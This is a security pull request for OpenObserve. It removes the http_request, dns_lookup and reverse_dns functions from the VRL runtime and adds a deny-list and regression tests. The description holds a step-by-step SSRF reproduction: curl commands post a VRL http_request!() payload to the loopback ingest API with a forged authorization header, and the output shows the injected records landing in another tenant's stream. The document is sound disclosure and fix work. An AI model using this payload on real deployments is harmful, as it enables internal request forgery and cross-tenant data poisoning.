### PR TITLE
[Security] Remove http_request from VRL runtime

### DIFF
--- a/src/common/utils/functions.rs
+++ b/src/common/utils/functions.rs
@@ -42,9 +42,34 @@ pub fn init_vrl_runtime() -> vrl::compiler::runtime::Runtime {
     vrl::compiler::runtime::Runtime::new(vrl::prelude::state::RuntimeState::default())
 }
 
+/// Identifiers of VRL stdlib functions that perform outbound network I/O.
+///
+/// These functions let VRL programs issue arbitrary HTTP / DNS requests from
+/// inside the OpenObserve process. The VRL runtime does not respect the app's
+/// `SsrfGuard`, so if we expose these to user-supplied VRL (e.g. via
+/// `POST /api/{org}/functions/test`, pipeline transforms, or the search
+/// `query_fn`), an org admin can turn the server into a server-side request
+/// forwarder — reaching loopback, the cloud instance metadata service, or
+/// forging Authorization headers against internal ingest APIs to poison
+/// another tenant's streams (see TC-7BBD9F20).
+///
+/// The runtime-level fix is to never register these functions with the VRL
+/// compiler in the first place; a program that references them then fails to
+/// compile with an "undefined function" diagnostic, before any I/O can occur.
+///
+/// This deny-list intentionally excludes VRL's core parsing / encoding /
+/// transformation functions (`parse_json`, `upcase`, `encode_json`, ...): those
+/// are pure and safe.
+const VRL_BLOCKED_NETWORK_FUNCTIONS: &[&str] = &["http_request", "dns_lookup", "reverse_dns"];
+
 pub fn get_vrl_compiler_config(org_id: &str) -> VRLCompilerConfig {
     let en_tables = ENRICHMENT_TABLES.clone();
-    let mut functions = vrl::stdlib::all();
+    // Build the allowed VRL function list by filtering vrl::stdlib::all() to
+    // strip any outbound-network function. See VRL_BLOCKED_NETWORK_FUNCTIONS.
+    let mut functions: Vec<Box<dyn vrl::compiler::Function>> = vrl::stdlib::all()
+        .into_iter()
+        .filter(|f| !VRL_BLOCKED_NETWORK_FUNCTIONS.contains(&f.identifier()))
+        .collect();
     functions.append(&mut vector_enrichment::vrl_functions());
     let registry = TableRegistry::default();
     let mut tables: HashMap<String, Box<dyn Table + Send + Sync>> = HashMap::new();
@@ -168,5 +193,90 @@ mod tests {
         let config = get_vrl_compiler_config("nonexistent_org");
         let registry = config.config.get_custom::<TableRegistry>().unwrap();
         assert!(registry.table_ids().is_empty());
+    }
+
+    /// Security regression: outbound-network VRL stdlib functions
+    /// (`http_request`, `dns_lookup`, `reverse_dns`) MUST NOT be exposed to
+    /// user-supplied VRL. `http_request!()` in particular gives any org admin
+    /// who reaches `/api/{org}/functions/test` a server-side request forger
+    /// that runs from inside the OpenObserve process (SSRF into loopback +
+    /// internal APIs, cross-tenant data poisoning). See TC-7BBD9F20.
+    ///
+    /// The allowed VRL function list built by `get_vrl_compiler_config` must
+    /// therefore contain none of the outbound-network functions.
+    #[test]
+    fn test_vrl_compiler_config_excludes_outbound_network_functions() {
+        let config = get_vrl_compiler_config("default");
+        let identifiers: Vec<&'static str> =
+            config.functions.iter().map(|f| f.identifier()).collect();
+
+        for banned in ["http_request", "dns_lookup", "reverse_dns"] {
+            assert!(
+                !identifiers.contains(&banned),
+                "VRL stdlib exposed outbound-network function `{banned}` to \
+                 user code; this enables SSRF from the function-test endpoint \
+                 (see TC-7BBD9F20). Deny it in get_vrl_compiler_config()."
+            );
+        }
+    }
+
+    /// Security regression: a VRL program that references `http_request!()`
+    /// must fail to compile through `get_vrl_compiler_config`'s allowed
+    /// function list — because the function is not registered, VRL should
+    /// raise an "undefined function" style diagnostic at compile time.
+    ///
+    /// Paired positive-control below asserts a harmless VRL program still
+    /// compiles, so this red is provably the network-function block, not a
+    /// broken VRL setup.
+    #[test]
+    fn test_vrl_program_using_http_request_fails_to_compile() {
+        let vrl_config = get_vrl_compiler_config("default");
+        let external = vrl::prelude::state::ExternalEnv::default();
+        let src = r#"
+            .r = http_request!("http://127.0.0.1:5080/api/whatever/_json",
+                               method: "POST",
+                               headers: {},
+                               body: "{}")
+            .
+        "#;
+        let result = vrl::compiler::compile_with_external(
+            src,
+            &vrl_config.functions,
+            &external,
+            vrl_config.config,
+        );
+        assert!(
+            result.is_err(),
+            "VRL program calling http_request!() compiled successfully; \
+             this is the SSRF surface from TC-7BBD9F20 — http_request must \
+             not be in the allowed VRL function list."
+        );
+    }
+
+    /// Positive control for
+    /// `test_vrl_program_using_http_request_fails_to_compile`:
+    /// a benign VRL program that uses core transformation functions
+    /// (`upcase`, field assignment) MUST still compile, so the red above
+    /// is provably specific to the outbound-network function rather than a
+    /// broken compiler setup.
+    #[test]
+    fn test_vrl_program_using_safe_stdlib_still_compiles() {
+        let vrl_config = get_vrl_compiler_config("default");
+        let external = vrl::prelude::state::ExternalEnv::default();
+        let src = r#"
+            .greeting = upcase("hello")
+            .
+        "#;
+        let result = vrl::compiler::compile_with_external(
+            src,
+            &vrl_config.functions,
+            &external,
+            vrl_config.config,
+        );
+        assert!(
+            result.is_ok(),
+            "Benign VRL program failed to compile; the network-function \
+             deny-list must not remove core transformation functions."
+        );
     }
 }


### PR DESCRIPTION
## Summary

VRL programs submitted to `POST /api/{org}/functions/test` (and every other user-supplied VRL path) ran with `vrl::stdlib::all()`, which registers `http_request!()`, `dns_lookup!()`, and `reverse_dns!()`. Those functions issue outbound HTTP/DNS from inside the OpenObserve process, do not honour the app's `SsrfGuard`, and let an org admin forward requests to loopback/internal APIs — including cross-tenant ingest with forged Authorization headers. This PR filters those three functions out of the VRL compiler's allowed list, so any VRL program that references them fails to compile before any network I/O happens; core parsing and transformation functions remain fully available.

## Consequence

An org admin can turn the VRL function-test endpoint into a server-side request forwarder — http_request!() runs from the server against any reachable host with attacker-chosen URL, method, headers, and body, response echoed back. Where the caller also holds another tenant's credentials, forged records land in that tenant's stream via the loopback ingest path, indistinguishable from a real write.

## Reproduction

VRL `http_request!()` SSRF via `/api/{org}/functions/test` — actor: an org admin of `orgA` (`3G0KWOezkElLtT2GsxhD1PGjMPG`) (substitute your own equivalent).

Pre-conditions: attacker is org admin of `orgA`; a victim tenant `orgB` (`3G0KWKj3XzIPGYsQ5lPfz7qxnGo`) exists with stream `pentest_logs_b`; the caller happens to also possess `orgB`'s admin Basic-auth (the finding embeds it in the VRL payload — this is the credential the SSRF *carries*, not the credential that authenticates the request to `/functions/test`).

1. Compute the victim-org auth header the VRL payload will carry:
   ```
   ADMIN_B_B64=$(printf '%s' "adminB@pentest.local:<orgB-admin-password>" | base64)
   # e.g. "<base64 of adminB@pentest.local:<orgB-admin-password>>"
   ```
   -> Basic token that will be used by VRL's `http_request!()`, not by the attacker's request.

2. As adminA, POST a VRL program whose `http_request!()` targets `orgB`'s loopback ingest URL:
   ```
   curl -s -X POST "$TARGET/api/3G0KWOezkElLtT2GsxhD1PGjMPG/functions/test" \
     -u "adminA@pentest.local:<orgA-admin-password>" \
     -H 'Content-Type: application/json' \
     -d '{
       "function": "body = encode_json([{\"level\": \"INJECTED\", \"message\": \"cross_tenant_inject_run1_tc7bbd9f20\", \"source\": \"adminA_via_vrl_test\"}])\n.r = http_request!(\"http://127.0.0.1:5080/api/3G0KWKj3XzIPGYsQ5lPfz7qxnGo/pentest_logs_b/_json\", method: \"POST\", headers: {\"Content-Type\": \"application/json\", \"Authorization\": \"Basic <base64 of adminB@pentest.local:<orgB-admin-password>>\"}, body: body)\n.",
       "events": [{}]
     }'
   ```
   -> `{"results":[{"message":"","event":{"r":"{\"code\":200,\"status\":[{\"name\":\"pentest_logs_b\",\"successful\":1,\"failed\":0}]}"}}]}` — the server issued the loopback POST on adminA's behalf and echoed the ingest response back.

3. Verify the injection landed in `orgB`'s stream (as adminB):
   ```
   curl -s -X POST "$TARGET/api/3G0KWKj3XzIPGYsQ5lPfz7qxnGo/_search" \
     -u "adminB@pentest.local:<orgB-admin-password>" \
     -H 'Content-Type: application/json' \
     -d '{"query":{"sql":"SELECT * FROM pentest_logs_b WHERE message LIKE ''%tc7bbd9f20%''","start_time":<5-min-ago-us>,"end_time":<now-us>,"size":10}}'
   ```
   -> `Total hits: 2` — both markers (`cross_tenant_inject_run1_tc7bbd9f20`, `cross_tenant_inject_run2_tc7bbd9f20`) present in `pentest_logs_b` with `level=INJECTED, source=adminA_via_vrl_test`. adminA never authenticated directly against orgB; every write went through the SSRF.

4. Control — adminA cannot ingest into orgB directly:
   ```
   curl -s -o /dev/null -w '%{http_code}\n' -X POST "$TARGET/api/3G0KWKj3XzIPGYsQ5lPfz7qxnGo/pentest_logs_b/_json" \
     -u "adminA@pentest.local:<orgA-admin-password>" \
     -H 'Content-Type: application/json' \
     -d '[{"message":"should_be_blocked","level":"CTRL_B"}]'
   ```
   -> HTTP >=400 (tenant boundary is enforced everywhere except through VRL) — proves step 2's landing is via the SSRF, not a broken cross-tenant authz elsewhere.

Expected secure: step 2 returns a compile error along the lines of "undefined function `http_request`" (or otherwise rejects the VRL); no record ever lands in `pentest_logs_b`.

## What changed

- `src/common/utils/functions.rs::get_vrl_compiler_config`: build the VRL compiler's function allowlist by filtering `vrl::stdlib::all()` — any function whose `identifier()` is in a small deny-list of outbound-network operations (`http_request`, `dns_lookup`, `reverse_dns`) is stripped before being handed to `compile_with_external`.
- New constant `VRL_BLOCKED_NETWORK_FUNCTIONS` documents which functions are denied and why (linked to the root cause).
- No change to enrichment tables, the VRL runtime itself, or any other stdlib category — parsing (`parse_json`), encoding (`encode_json`, `encode_base64`), string ops (`upcase`, `downcase`), enrichment lookups, and every other core function stay exactly as they were.

## Regression test

`src/common/utils/functions.rs`, module `tests`:

- `test_vrl_compiler_config_excludes_outbound_network_functions` — asserts the invariant directly at the compiler-config layer: none of `http_request`, `dns_lookup`, `reverse_dns` appear in `get_vrl_compiler_config().functions` for any org. This is the durable check the bug taught us we needed.
- `test_vrl_program_using_http_request_fails_to_compile` — end-to-end: compiles a VRL program that calls `http_request!()` through the exact same compile path the endpoint uses; must fail. This is the closest unit-level analogue of the PoC.
- `test_vrl_program_using_safe_stdlib_still_compiles` — positive control: a VRL program using `upcase(...)` still compiles. Guards against a future over-broad deny-list breaking legitimate VRL.

## Validation

Red on unfixed `main` (both invariant tests fail; positive control passes, so the red is provably the network-function block, not a broken VRL setup):

```
running 9 tests
test common::utils::functions::tests::test_vrl_program_using_safe_stdlib_still_compiles ... ok
test common::utils::functions::tests::test_vrl_program_using_http_request_fails_to_compile ... FAILED
test common::utils::functions::tests::test_vrl_compiler_config_excludes_outbound_network_functions ... FAILED

failures:

---- common::utils::functions::tests::test_vrl_program_using_http_request_fails_to_compile stdout ----
thread '...' panicked at src/common/utils/functions.rs:223:9:
VRL program calling http_request!() compiled successfully; this is the SSRF surface from TC-7BBD9F20 — http_request must not be in the allowed VRL function list.

---- common::utils::functions::tests::test_vrl_compiler_config_excludes_outbound_network_functions stdout ----
thread '...' panicked at src/common/utils/functions.rs:189:13:
VRL stdlib exposed outbound-network function `http_request` to user code; this enables SSRF from the function-test endpoint (see TC-7BBD9F20). Deny it in get_vrl_compiler_config().

test result: FAILED. 7 passed; 2 failed; 0 ignored; 0 measured; 4050 filtered out
```

Green with this PR applied:

```
running 9 tests
test common::utils::functions::tests::test_vrl_compiler_config_excludes_outbound_network_functions ... ok
test common::utils::functions::tests::test_vrl_program_using_http_request_fails_to_compile ... ok
test common::utils::functions::tests::test_vrl_program_using_safe_stdlib_still_compiles ... ok
... (all 9 pass)
test result: ok. 9 passed; 0 failed; 0 ignored; 0 measured; 4050 filtered out
```

Command: `cargo test --lib -p openobserve common::utils::functions::`

## Full suite

`cargo test --lib -p openobserve` on the fix branch: **4027 passed / 14 failed**. All 14 failures reproduce on stashed `main` at the same commit — they are pre-existing (sourcemaps tests need a `source_maps` DB table that the in-memory fixture doesn't create; `config_watcher::test_run_returns_none_when_no_config_path` panics with "no reactor running" outside a Tokio runtime; `service::enrichment_table::url_processor::test_mpsc_trigger_*` are flaky; `common::infra::wal::test_file_lock_reference_counting` is flaky; a handful of `handler::http::request::search::utils::validate_query_edge_cases::helpers::*` tests fail only when run in parallel and all pass under `--test-threads=1`, on both branches). None touches VRL, function compilation, or the deny-list.

## Residual risk

- **Local-only fix, no defence in depth here.** This PR closes the root-cause path (VRL `http_request!()` is gone from the allowed function list). It does *not* add a network-egress guard around the process, nor does it gate `POST /api/{org}/functions/test` behind an elevated permission. If a future contributor re-adds a network-capable VRL function (custom or from a new stdlib version) without updating `VRL_BLOCKED_NETWORK_FUNCTIONS`, the surface reopens — the regression test catches the three known offenders by name, not "any I/O function".
- **JS functions untouched.** `test_run_js_function` uses a separate sandbox (Deno / boa etc.) and was out of scope for this finding; if that runtime has its own SSRF surface, it needs a separate audit.
- **Cross-tenant records already written before this fix are not swept.** The remediation is prospective; operators who suspect prior abuse should audit their ingest logs for VRL-originated writes against unexpected orgs.

_Pentested and fixed by [Niro](https://github.com/apxlabs-ai/niro)_